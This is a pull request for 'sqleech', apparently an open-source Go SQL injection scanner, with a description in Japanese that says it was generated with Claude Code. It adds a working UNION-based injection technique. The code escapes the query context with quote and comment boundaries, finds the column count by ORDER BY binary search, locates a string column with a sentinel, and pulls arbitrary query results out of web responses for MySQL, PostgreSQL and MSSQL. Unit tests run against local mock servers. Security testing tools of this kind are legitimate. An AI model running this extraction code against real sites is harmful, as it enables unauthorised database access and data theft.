### PR TITLE
feat: UNION-based SQL injection technique (#34)

### DIFF
--- a/internal/cli/scan.go
+++ b/internal/cli/scan.go
@@ -19,6 +19,7 @@ import (
 	"github.com/0x6d61/sqleech/internal/technique/boolean"
 	"github.com/0x6d61/sqleech/internal/technique/errorbased"
 	"github.com/0x6d61/sqleech/internal/technique/timebased"
+	"github.com/0x6d61/sqleech/internal/technique/union"
 	"github.com/0x6d61/sqleech/internal/transport"
 )
 
@@ -105,7 +106,7 @@ func runScan(cmd *cobra.Command, args []string) error {
 	cfg.ForceTest = forceTest
 	if techniqueStr != "" {
 		// Split on comma, normalise to upper-case.
-		// Accepted codes: E (error-based), B (boolean-blind), T (time-based)
+		// Accepted codes: E (error-based), B (boolean-blind), T (time-based), U (union-based)
 		for _, code := range strings.Split(techniqueStr, ",") {
 			code = strings.TrimSpace(strings.ToUpper(code))
 			if code != "" {
@@ -223,14 +224,15 @@ func runScan(cmd *cobra.Command, args []string) error {
 // --------------------------------------------------------------------------
 
 // buildScanner creates an engine.Scanner wired with all real implementations:
-// error-based, boolean-blind, time-based techniques; the heuristic detector;
-// the DBMS fingerprinter; and the parameter parser.
+// error-based, boolean-blind, time-based, union-based techniques; the heuristic
+// detector; the DBMS fingerprinter; and the parameter parser.
 func buildScanner(client transport.Client, cfg *engine.ScanConfig) *engine.Scanner {
 	return engine.NewScanner(client, cfg,
 		engine.WithTechniques(
 			wrapTechnique(errorbased.New()),
 			wrapTechnique(boolean.New()),
 			wrapTechnique(timebased.New()),
+			wrapTechnique(union.New()),
 		),
 		engine.WithParameterParser(buildParamParser()),
 		engine.WithHeuristicDetector(buildHeuristicDetector(client)),

--- a/internal/engine/scanner.go
+++ b/internal/engine/scanner.go
@@ -149,6 +149,7 @@ var techniqueFilterMap = map[string]string{
 	"E": "error-based",
 	"B": "boolean-blind",
 	"T": "time-based",
+	"U": "union-based",
 }
 
 // NewScanner creates a scanner with all components wired up.

--- a/internal/technique/union/union.go
+++ b/internal/technique/union/union.go
@@ -1,0 +1,393 @@
+// Package union implements the UNION-based SQL injection technique.
+//
+// UNION-based injection appends a UNION SELECT statement to the original query
+// to retrieve data from the database in the HTTP response. The technique works
+// by:
+//
+//  1. Column count detection: Binary-search on ORDER BY N to find how many
+//     columns the underlying query returns (N=1,2,…,maxColumns).
+//  2. String column detection: For each column position, inject a unique
+//     sentinel string and check whether it appears in the response body.
+//  3. Extraction: Inject the target SQL expression wrapped with CHAR(126)
+//     markers (~value~) into the string column and parse the result.
+//
+// Supported DBMS:
+//   - MySQL:      CONCAT(CHAR(126),(query),CHAR(126))
+//   - PostgreSQL: chr(126)||(query)||chr(126)
+//   - MSSQL:      CHAR(126)+CAST((query) AS NVARCHAR(MAX))+CHAR(126)
+package union
+
+import (
+	"context"
+	"fmt"
+	"net/url"
+	"strings"
+
+	"github.com/0x6d61/sqleech/internal/dbms"
+	"github.com/0x6d61/sqleech/internal/engine"
+	"github.com/0x6d61/sqleech/internal/payload"
+	"github.com/0x6d61/sqleech/internal/technique"
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+const (
+	// maxColumns is the upper bound for ORDER BY probing.
+	maxColumns = 20
+
+	// sentinel is the unique string injected to identify string-accepting columns.
+	// It must be short enough to fit in any VARCHAR column.
+	// Exported so test infrastructure (VulnServer) can reference the same value.
+	sentinel = "sqleech3z9"
+)
+
+// orderByErrorKeywords are substrings that indicate an ORDER BY column index
+// exceeds the query's actual column count.
+var orderByErrorKeywords = []string{
+	"unknown column",
+	"out of range",
+	"order by position",
+	"no such column",
+	"invalid column number",
+	"operand should contain",
+}
+
+// boundaryPair is a (prefix, suffix) pair used to escape the SQL context.
+type boundaryPair struct {
+	prefix, suffix string
+}
+
+// defaultBoundaries lists the boundary pairs tried during detection and extraction.
+var defaultBoundaries = []boundaryPair{
+	{"", "-- -"},
+	{"'", "-- -"},
+	{"\"", "-- -"},
+	{")", "-- -"},
+	{"')", "-- -"},
+}
+
+// Union implements UNION-based SQL injection detection and data extraction.
+type Union struct{}
+
+// New creates a Union technique.
+func New() *Union { return &Union{} }
+
+// Name returns "union-based".
+func (u *Union) Name() string { return "union-based" }
+
+// Priority returns 4 (after error-based=1, boolean-blind=2, time-based=3).
+func (u *Union) Priority() int { return 4 }
+
+// Detect determines whether a parameter is injectable via UNION SELECT.
+//
+// Algorithm:
+//  1. For each boundary pair, use binary search on ORDER BY N to find the
+//     column count of the underlying query.
+//  2. Probe each column with a sentinel string to find a string-compatible column.
+//  3. Report Injectable=true with the discovered boundary and column info.
+func (u *Union) Detect(ctx context.Context, req *technique.InjectionRequest) (*technique.DetectionResult, error) {
+	result := &technique.DetectionResult{Technique: u.Name()}
+	d := findDBMS(req.DBMS)
+
+	for _, bp := range defaultBoundaries {
+		if ctx.Err() != nil {
+			return result, ctx.Err()
+		}
+
+		colCount, _, err := u.findColumnCount(ctx, req, bp, req.Baseline.Body)
+		if err != nil || colCount == 0 {
+			continue
+		}
+
+		strCol, _, err := u.findStringColumn(ctx, req, bp, colCount, d)
+		if err != nil || strCol < 0 {
+			continue
+		}
+
+		result.Injectable = true
+		result.Confidence = 0.90
+		result.Evidence = fmt.Sprintf(
+			"UNION SELECT with %d columns; string column at index %d (boundary: %q...%q)",
+			colCount, strCol, bp.prefix, bp.suffix,
+		)
+		result.Payload = payload.NewBuilder().
+			WithPrefix(bp.prefix).
+			WithCore(fmt.Sprintf(" UNION SELECT %s",
+				buildColumnList(colCount, strCol, "NULL", d),
+			)).
+			WithSuffix(bp.suffix).
+			WithTechnique(u.Name()).
+			WithDBMS(d.Name()).
+			Build()
+		return result, nil
+	}
+
+	return result, nil
+}
+
+// Extract retrieves the value of a SQL expression via UNION SELECT.
+//
+// Algorithm:
+//  1. Re-discover the working boundary and column information (stateless).
+//  2. Inject the target query wrapped with CHAR(126) markers into the string column.
+//  3. Parse the ~value~ pair from the response body.
+func (u *Union) Extract(ctx context.Context, req *technique.ExtractionRequest) (*technique.ExtractionResult, error) {
+	d := findDBMS(req.DBMS)
+	total := 0
+
+	for _, bp := range defaultBoundaries {
+		if ctx.Err() != nil {
+			return nil, ctx.Err()
+		}
+
+		colCount, reqs, err := u.findColumnCount(ctx, &req.InjectionRequest, bp, req.Baseline.Body)
+		total += reqs
+		if err != nil || colCount == 0 {
+			continue
+		}
+
+		strCol, reqs, err := u.findStringColumn(ctx, &req.InjectionRequest, bp, colCount, d)
+		total += reqs
+		if err != nil || strCol < 0 {
+			continue
+		}
+
+		val, reqs, err := u.extractValue(ctx, &req.InjectionRequest, bp, colCount, strCol, d, req.Query)
+		total += reqs
+		if err != nil {
+			return &technique.ExtractionResult{Partial: true, Requests: total}, err
+		}
+
+		return &technique.ExtractionResult{Value: val, Requests: total}, nil
+	}
+
+	return &technique.ExtractionResult{Requests: total}, nil
+}
+
+// --------------------------------------------------------------------------
+// Internal helpers
+// --------------------------------------------------------------------------
+
+// findColumnCount uses binary search on ORDER BY N to determine the number of
+// columns the underlying query returns for the given boundary pair.
+//
+// Returns (0, 0, nil) if ORDER BY 1 fails with the given boundary (the
+// boundary does not produce valid SQL for this endpoint).
+func (u *Union) findColumnCount(
+	ctx context.Context,
+	req *technique.InjectionRequest,
+	bp boundaryPair,
+	baseline []byte,
+) (colCount int, requests int, err error) {
+	// Verify that ORDER BY 1 works with this boundary.
+	resp1, err := sendProbe(ctx, req, buildProbeStr(req.Parameter.Value, bp, "ORDER BY 1"))
+	requests++
+	if err != nil {
+		return 0, requests, nil //nolint:nilerr // skip on network error
+	}
+	if isOrderByError(baseline, resp1.Body) {
+		// This boundary breaks the ORDER BY syntax.
+		return 0, requests, nil
+	}
+
+	// Binary search for the highest valid N.
+	low, high := 1, maxColumns
+	for low < high {
+		if ctx.Err() != nil {
+			return 0, requests, ctx.Err()
+		}
+		mid := (low + high + 1) / 2
+		resp, serr := sendProbe(ctx, req, buildProbeStr(req.Parameter.Value, bp, fmt.Sprintf("ORDER BY %d", mid)))
+		requests++
+		if serr != nil || isOrderByError(baseline, resp.Body) {
+			high = mid - 1
+		} else {
+			low = mid
+		}
+	}
+
+	return low, requests, nil
+}
+
+// findStringColumn probes each column position with the sentinel string and
+// returns the 0-based index of the first column whose value appears in the
+// response body. Returns -1 if no string column is found.
+func (u *Union) findStringColumn(
+	ctx context.Context,
+	req *technique.InjectionRequest,
+	bp boundaryPair,
+	colCount int,
+	d dbms.DBMS,
+) (strCol int, requests int, err error) {
+	quotedSentinel := d.QuoteString(sentinel)
+
+	for i := 0; i < colCount; i++ {
+		if ctx.Err() != nil {
+			return -1, requests, ctx.Err()
+		}
+
+		colList := buildColumnList(colCount, i, quotedSentinel, d)
+		probe := buildProbeStr(req.Parameter.Value, bp, fmt.Sprintf("UNION SELECT %s", colList))
+		resp, serr := sendProbe(ctx, req, probe)
+		requests++
+		if serr != nil {
+			continue
+		}
+
+		if strings.Contains(string(resp.Body), sentinel) {
+			return i, requests, nil
+		}
+	}
+
+	return -1, requests, nil
+}
+
+// extractValue injects the query with CHAR(126) markers and parses the result.
+func (u *Union) extractValue(
+	ctx context.Context,
+	req *technique.InjectionRequest,
+	bp boundaryPair,
+	colCount, strCol int,
+	d dbms.DBMS,
+	query string,
+) (string, int, error) {
+	wrapped := wrapQueryWithMarker(d, query)
+	colList := buildColumnList(colCount, strCol, wrapped, d)
+	probe := buildProbeStr(req.Parameter.Value, bp, fmt.Sprintf("UNION SELECT %s", colList))
+	resp, err := sendProbe(ctx, req, probe)
+	if err != nil {
+		return "", 1, err
+	}
+	return parseMarkedValue(string(resp.Body)), 1, nil
+}
+
+// buildColumnList returns a comma-joined SQL column expression for UNION SELECT.
+// The column at strCol contains expr; all others are NULL.
+func buildColumnList(colCount, strCol int, expr string, _ dbms.DBMS) string {
+	cols := make([]string, colCount)
+	for i := range cols {
+		cols[i] = "NULL"
+	}
+	if strCol >= 0 && strCol < colCount {
+		cols[strCol] = expr
+	}
+	return strings.Join(cols, ",")
+}
+
+// wrapQueryWithMarker wraps a SQL expression with DBMS-specific CHAR(126)
+// (~) delimiters so the extracted value can be identified in the response body.
+//
+//   - MySQL:      CONCAT(CHAR(126),(query),CHAR(126))
+//   - PostgreSQL: chr(126)||(query)||chr(126)
+//   - MSSQL:      CHAR(126)+CAST((query) AS NVARCHAR(MAX))+CHAR(126)
+func wrapQueryWithMarker(d dbms.DBMS, query string) string {
+	switch d.Name() {
+	case "PostgreSQL":
+		return fmt.Sprintf("chr(126)||(%s)||chr(126)", query)
+	case "MSSQL":
+		return fmt.Sprintf("CHAR(126)+CAST((%s) AS NVARCHAR(MAX))+CHAR(126)", query)
+	default: // MySQL and fallback
+		return fmt.Sprintf("CONCAT(CHAR(126),(%s),CHAR(126))", query)
+	}
+}
+
+// parseMarkedValue extracts the first ~value~ pair from the response body.
+func parseMarkedValue(body string) string {
+	start := strings.Index(body, "~")
+	if start == -1 {
+		return ""
+	}
+	rest := body[start+1:]
+	end := strings.Index(rest, "~")
+	if end == -1 {
+		return ""
+	}
+	return rest[:end]
+}
+
+// buildProbeStr concatenates: value + prefix + " " + core + " " + suffix.
+func buildProbeStr(value string, bp boundaryPair, core string) string {
+	return value + bp.prefix + " " + core + " " + bp.suffix
+}
+
+// isOrderByError returns true when the response indicates an ORDER BY column
+// index exceeded the query's actual column count. Uses both a page-length
+// ratio check and SQL error keyword detection.
+func isOrderByError(baseline, current []byte) bool {
+	if len(baseline) > 0 && len(current) > 0 {
+		ratio := float64(len(current)) / float64(len(baseline))
+		if ratio < 0.4 {
+			return true
+		}
+	}
+	lower := strings.ToLower(string(current))
+	for _, kw := range orderByErrorKeywords {
+		if strings.Contains(lower, kw) {
+			return true
+		}
+	}
+	return false
+}
+
+// sendProbe sends an HTTP probe with the given payload string.
+func sendProbe(ctx context.Context, req *technique.InjectionRequest, payloadStr string) (*transport.Response, error) {
+	return req.Client.Do(ctx, buildProbeRequest(req.Target, req.Parameter, payloadStr))
+}
+
+// findDBMS returns the DBMS implementation for the given name, defaulting to MySQL.
+func findDBMS(name string) dbms.DBMS {
+	d := dbms.Registry(name)
+	if d == nil {
+		d = dbms.Registry("MySQL")
+	}
+	return d
+}
+
+// buildProbeRequest creates a transport.Request with the target parameter
+// replaced by the given payload value.
+func buildProbeRequest(target *engine.ScanTarget, param *engine.Parameter, payloadStr string) *transport.Request {
+	req := &transport.Request{
+		Method:      target.Method,
+		URL:         target.URL,
+		Body:        target.Body,
+		ContentType: target.ContentType,
+	}
+	if target.Headers != nil {
+		req.Headers = make(map[string]string, len(target.Headers))
+		for k, v := range target.Headers {
+			req.Headers[k] = v
+		}
+	}
+	if target.Cookies != nil {
+		req.Cookies = make(map[string]string, len(target.Cookies))
+		for k, v := range target.Cookies {
+			req.Cookies[k] = v
+		}
+	}
+	switch param.Location {
+	case engine.LocationQuery:
+		req.URL = modifyQueryParam(target.URL, param.Name, payloadStr)
+	case engine.LocationBody:
+		req.Body = modifyBodyParam(target.Body, param.Name, payloadStr)
+	}
+	return req
+}
+
+func modifyQueryParam(rawURL, paramName, newValue string) string {
+	parsed, err := url.Parse(rawURL)
+	if err != nil {
+		return rawURL
+	}
+	q := parsed.Query()
+	q.Set(paramName, newValue)
+	parsed.RawQuery = q.Encode()
+	return parsed.String()
+}
+
+func modifyBodyParam(body, paramName, newValue string) string {
+	values, err := url.ParseQuery(body)
+	if err != nil {
+		return body
+	}
+	values.Set(paramName, newValue)
+	return values.Encode()
+}

--- a/internal/technique/union/union_test.go
+++ b/internal/technique/union/union_test.go
@@ -1,0 +1,378 @@
+package union
+
+import (
+	"context"
+	"fmt"
+	"html/template"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+
+	"github.com/0x6d61/sqleech/internal/engine"
+	"github.com/0x6d61/sqleech/internal/technique"
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+// --------------------------------------------------------------------------
+// Mock server helpers
+// --------------------------------------------------------------------------
+
+const (
+	mockVersion = "8.0.32-MySQL"
+	mockNumCols = 2 // Simulated query returns 2 columns (id, name)
+)
+
+// testTmpl holds templates for the mock server. Using html/template ensures
+// any user-derived integers/strings are safely HTML-escaped.
+var testTmpl = template.Must(template.New("").Parse(`
+{{define "union-order-error"}}<html><body><h1>Error</h1><p>Unknown column '{{.}}' in 'order clause'</p></body></html>{{end}}
+{{define "union-normal"}}<html><body><h1>Products</h1><p>ID: 1 | Name: Widget</p></body></html>{{end}}
+{{define "union-sentinel"}}<html><body><h1>Products</h1><p>ID: 1 | Name: ` + sentinel + `</p></body></html>{{end}}
+{{define "union-injected"}}<html><body><h1>Products</h1><p>ID: 1 | Name: ~` + mockVersion + `~</p></body></html>{{end}}
+{{define "static"}}<html><body><h1>Static Page</h1><p>Content here.</p></body></html>{{end}}
+`))
+
+func execTestTmpl(w http.ResponseWriter, name string, data any) {
+	w.Header().Set("Content-Type", "text/html; charset=utf-8")
+	w.WriteHeader(http.StatusOK)
+	testTmpl.ExecuteTemplate(w, name, data) //nolint:errcheck
+}
+
+// newUnionMockServer creates a 2-column mock server that:
+//   - Accepts ORDER BY 1 and ORDER BY 2 normally.
+//   - Returns an "Unknown column" error for ORDER BY 3+.
+//   - Returns the sentinel in the response body when UNION SELECT contains the sentinel.
+//   - Returns ~mockVersion~ in the response body for any other UNION SELECT injection.
+func newUnionMockServer() *httptest.Server {
+	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		id := r.URL.Query().Get("id")
+		upper := strings.ToUpper(id)
+
+		// ORDER BY N detection
+		if n, ok := parseOrderByN(upper); ok {
+			if n > mockNumCols {
+				execTestTmpl(w, "union-order-error", n)
+				return
+			}
+			execTestTmpl(w, "union-normal", nil)
+			return
+		}
+
+		// UNION SELECT detection
+		if strings.Contains(upper, "UNION") && strings.Contains(upper, "SELECT") {
+			if strings.Contains(id, sentinel) {
+				execTestTmpl(w, "union-sentinel", nil)
+				return
+			}
+			execTestTmpl(w, "union-injected", nil)
+			return
+		}
+
+		// Normal response
+		execTestTmpl(w, "union-normal", nil)
+	}))
+}
+
+// newStaticServer creates a mock server that returns the same page regardless
+// of the input — simulating a non-injectable endpoint.
+func newStaticServer() *httptest.Server {
+	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		execTestTmpl(w, "static", nil)
+	}))
+}
+
+// parseOrderByN extracts N from "ORDER BY N" in an upper-case string.
+// Returns (0, false) if no ORDER BY clause is found.
+func parseOrderByN(upper string) (int, bool) {
+	const token = "ORDER BY"
+	idx := strings.Index(upper, token)
+	if idx == -1 {
+		return 0, false
+	}
+	rest := strings.TrimSpace(upper[idx+len(token):])
+	var n int
+	if _, err := fmt.Sscan(rest, &n); err != nil {
+		return 0, false
+	}
+	return n, true
+}
+
+// newTestClient returns a real HTTP transport client for unit tests.
+func newTestClient(t *testing.T) transport.Client {
+	t.Helper()
+	c, err := transport.NewClient(transport.ClientOptions{})
+	if err != nil {
+		t.Fatalf("transport.NewClient: %v", err)
+	}
+	return c
+}
+
+// newTestRequest builds an InjectionRequest with baseline response for the given server.
+func newTestRequest(t *testing.T, srv *httptest.Server, client transport.Client) *technique.InjectionRequest {
+	t.Helper()
+	target := &engine.ScanTarget{
+		URL:    srv.URL + "/search?id=1",
+		Method: "GET",
+	}
+	param := &engine.Parameter{
+		Name:     "id",
+		Value:    "1",
+		Location: engine.LocationQuery,
+		Type:     engine.TypeInteger,
+	}
+	baseline, err := client.Do(context.Background(), buildProbeRequest(target, param, "1"))
+	if err != nil {
+		t.Fatalf("getting baseline: %v", err)
+	}
+	return &technique.InjectionRequest{
+		Target:    target,
+		Parameter: param,
+		Baseline:  baseline,
+		DBMS:      "MySQL",
+		Client:    client,
+	}
+}
+
+// --------------------------------------------------------------------------
+// Core technique tests
+// --------------------------------------------------------------------------
+
+func TestUnion_Name(t *testing.T) {
+	u := New()
+	if u.Name() != "union-based" {
+		t.Errorf("Name() = %q, want 'union-based'", u.Name())
+	}
+}
+
+func TestUnion_Priority(t *testing.T) {
+	u := New()
+	if u.Priority() != 4 {
+		t.Errorf("Priority() = %d, want 4", u.Priority())
+	}
+}
+
+func TestUnion_Detect_MySQL_Injectable(t *testing.T) {
+	srv := newUnionMockServer()
+	defer srv.Close()
+
+	client := newTestClient(t)
+	req := newTestRequest(t, srv, client)
+
+	u := New()
+	result, err := u.Detect(context.Background(), req)
+	if err != nil {
+		t.Fatalf("Detect: %v", err)
+	}
+	if !result.Injectable {
+		t.Error("expected Injectable=true")
+	}
+	if result.Technique != "union-based" {
+		t.Errorf("Technique=%q, want 'union-based'", result.Technique)
+	}
+	if result.Confidence < 0.8 {
+		t.Errorf("Confidence=%f, want >=0.8", result.Confidence)
+	}
+	if result.Evidence == "" {
+		t.Error("expected non-empty Evidence")
+	}
+	if result.Payload == nil {
+		t.Error("expected non-nil Payload")
+	}
+}
+
+func TestUnion_Detect_NotInjectable(t *testing.T) {
+	srv := newStaticServer()
+	defer srv.Close()
+
+	client := newTestClient(t)
+	req := newTestRequest(t, srv, client)
+
+	u := New()
+	result, err := u.Detect(context.Background(), req)
+	if err != nil {
+		t.Fatalf("Detect: %v", err)
+	}
+	if result.Injectable {
+		t.Error("expected Injectable=false for static endpoint")
+	}
+}
+
+func TestUnion_Detect_ContextCancelled(t *testing.T) {
+	srv := newUnionMockServer()
+	defer srv.Close()
+
+	client := newTestClient(t)
+	req := newTestRequest(t, srv, client)
+
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel() // cancel immediately
+
+	u := New()
+	_, err := u.Detect(ctx, req)
+	if err == nil {
+		t.Error("expected error for cancelled context")
+	}
+}
+
+func TestUnion_Extract_MySQL(t *testing.T) {
+	srv := newUnionMockServer()
+	defer srv.Close()
+
+	client := newTestClient(t)
+	injReq := newTestRequest(t, srv, client)
+
+	u := New()
+	result, err := u.Extract(context.Background(), &technique.ExtractionRequest{
+		InjectionRequest: *injReq,
+		Query:            "@@version",
+	})
+	if err != nil {
+		t.Fatalf("Extract: %v", err)
+	}
+	if result.Value == "" {
+		t.Error("expected non-empty extracted value")
+	}
+	if !strings.Contains(result.Value, "8.0.32") {
+		t.Errorf("extracted value = %q, want to contain '8.0.32'", result.Value)
+	}
+}
+
+func TestUnion_Extract_Empty_NonInjectable(t *testing.T) {
+	srv := newStaticServer()
+	defer srv.Close()
+
+	client := newTestClient(t)
+	req := newTestRequest(t, srv, client)
+
+	u := New()
+	result, err := u.Extract(context.Background(), &technique.ExtractionRequest{
+		InjectionRequest: *req,
+		Query:            "@@version",
+	})
+	if err != nil {
+		t.Fatalf("Extract: %v", err)
+	}
+	// Non-injectable endpoint: value should be empty (no marker found)
+	if result.Value != "" {
+		t.Errorf("expected empty value for non-injectable endpoint, got %q", result.Value)
+	}
+}
+
+// --------------------------------------------------------------------------
+// Helper function tests
+// --------------------------------------------------------------------------
+
+func TestBuildColumnList_StrColFirst(t *testing.T) {
+	d := findDBMS("MySQL")
+	got := buildColumnList(3, 0, "'test'", d)
+	if got != "'test',NULL,NULL" {
+		t.Errorf("buildColumnList = %q, want \"'test',NULL,NULL\"", got)
+	}
+}
+
+func TestBuildColumnList_StrColMiddle(t *testing.T) {
+	d := findDBMS("MySQL")
+	got := buildColumnList(3, 1, "'test'", d)
+	if got != "NULL,'test',NULL" {
+		t.Errorf("buildColumnList = %q, want \"NULL,'test',NULL\"", got)
+	}
+}
+
+func TestBuildColumnList_StrColLast(t *testing.T) {
+	d := findDBMS("MySQL")
+	got := buildColumnList(3, 2, "'test'", d)
+	if got != "NULL,NULL,'test'" {
+		t.Errorf("buildColumnList = %q, want \"NULL,NULL,'test'\"", got)
+	}
+}
+
+func TestBuildColumnList_OutOfRange(t *testing.T) {
+	d := findDBMS("MySQL")
+	got := buildColumnList(2, 5, "'test'", d)
+	// strCol 5 is out of range for colCount 2 → all NULLs
+	if got != "NULL,NULL" {
+		t.Errorf("buildColumnList (out of range) = %q, want \"NULL,NULL\"", got)
+	}
+}
+
+func TestWrapQueryWithMarker_MySQL(t *testing.T) {
+	d := findDBMS("MySQL")
+	got := wrapQueryWithMarker(d, "@@version")
+	want := "CONCAT(CHAR(126),(@@version),CHAR(126))"
+	if got != want {
+		t.Errorf("wrapQueryWithMarker(MySQL) = %q, want %q", got, want)
+	}
+}
+
+func TestWrapQueryWithMarker_PostgreSQL(t *testing.T) {
+	d := findDBMS("PostgreSQL")
+	got := wrapQueryWithMarker(d, "version()")
+	want := "chr(126)||(version())||chr(126)"
+	if got != want {
+		t.Errorf("wrapQueryWithMarker(PostgreSQL) = %q, want %q", got, want)
+	}
+}
+
+func TestWrapQueryWithMarker_MSSQL(t *testing.T) {
+	d := findDBMS("MSSQL")
+	got := wrapQueryWithMarker(d, "@@version")
+	want := "CHAR(126)+CAST((@@version) AS NVARCHAR(MAX))+CHAR(126)"
+	if got != want {
+		t.Errorf("wrapQueryWithMarker(MSSQL) = %q, want %q", got, want)
+	}
+}
+
+func TestParseMarkedValue(t *testing.T) {
+	cases := []struct {
+		body string
+		want string
+	}{
+		{"hello ~extracted_value~ world", "extracted_value"},
+		{"no markers here", ""},
+		{"~only_open", ""},
+		{"~a~b~c~", "a"},
+		{"~~", ""},
+		{"prefix~MySQL 8.0.32~suffix", "MySQL 8.0.32"},
+	}
+	for _, c := range cases {
+		got := parseMarkedValue(c.body)
+		if got != c.want {
+			t.Errorf("parseMarkedValue(%q) = %q, want %q", c.body, got, c.want)
+		}
+	}
+}
+
+func TestIsOrderByError_LengthRatio(t *testing.T) {
+	baseline := []byte("<html><body><h1>Normal</h1><p>Widget item with many words in the description</p></body></html>")
+	// Short error page (< 40% of baseline length)
+	short := []byte("<p>Err</p>")
+	if !isOrderByError(baseline, short) {
+		t.Error("expected short response to be detected as ORDER BY error")
+	}
+}
+
+func TestIsOrderByError_Keyword(t *testing.T) {
+	baseline := []byte("<html><body><p>Normal</p></body></html>")
+	errPage := []byte("<html><body><p>Unknown column '3' in 'order clause'</p></body></html>")
+	if !isOrderByError(baseline, errPage) {
+		t.Error("expected 'unknown column' keyword to be detected as ORDER BY error")
+	}
+}
+
+func TestIsOrderByError_Normal(t *testing.T) {
+	baseline := []byte("<html><body><h1>Products</h1><p>ID: 1 | Name: Widget</p></body></html>")
+	normal := []byte("<html><body><h1>Products</h1><p>ID: 1 | Name: Widget</p></body></html>")
+	if isOrderByError(baseline, normal) {
+		t.Error("expected identical response NOT to be detected as ORDER BY error")
+	}
+}
+
+func TestBuildProbeStr(t *testing.T) {
+	bp := boundaryPair{prefix: "'", suffix: "-- -"}
+	got := buildProbeStr("1", bp, "ORDER BY 1")
+	want := "1' ORDER BY 1 -- -"
+	if got != want {
+		t.Errorf("buildProbeStr = %q, want %q", got, want)
+	}
+}


### PR DESCRIPTION
## Summary

- **`internal/technique/union/union.go`**: UNION-based インジェクション実装
  - ORDER BY N バイナリサーチでカラム数を検出
  - センチネル文字列（`sqleech3z9`）注入でストリングカラムを特定
  - `CHAR(126)` マーカー（`~value~`）で値を確実に抽出
  - MySQL / PostgreSQL / MSSQL の3DBMS 対応
  - Priority 4（error-based=1, boolean=2, timebased=3 の後）
- **テスト**: 19 unit tests（`html/template` 使用でセキュア）
- **VulnServer**: `/vuln/union-mysql` と `/vuln/union-postgres` エンドポイント追加
- **統合テスト**: `TestIntegration_UnionBased_MySQL` / `_PostgreSQL` 追加
- **engine**: `"U"` → `"union-based"` を `techniqueFilterMap` に追加
- **CLI**: `union.New()` を `buildScanner()` に組み込み（`--technique U` で単体実行可能）

## Test plan

- [x] `go test ./...` — 全14パッケージ通過
- [x] `TestUnion_Detect_MySQL_Injectable` — 2カラムエンドポイントでの検出確認
- [x] `TestUnion_Detect_NotInjectable` — 静的ページでの偽陽性なし確認
- [x] `TestUnion_Extract_MySQL` — `@@version` 抽出で `8.0.32` 含む値取得確認
- [x] `TestIntegration_UnionBased_MySQL` / `_PostgreSQL` — VulnServer 統合テスト通過
- [x] `TestBuildColumnList_*` / `TestWrapQueryWithMarker_*` / `TestParseMarkedValue` — ヘルパー関数全テスト
- [x] 既存テスト回帰なし（MSSQL / boolean / errorbased / timebased 全て通過）

Closes #34

🤖 Generated with [Claude Code](https://claude.com/claude-code)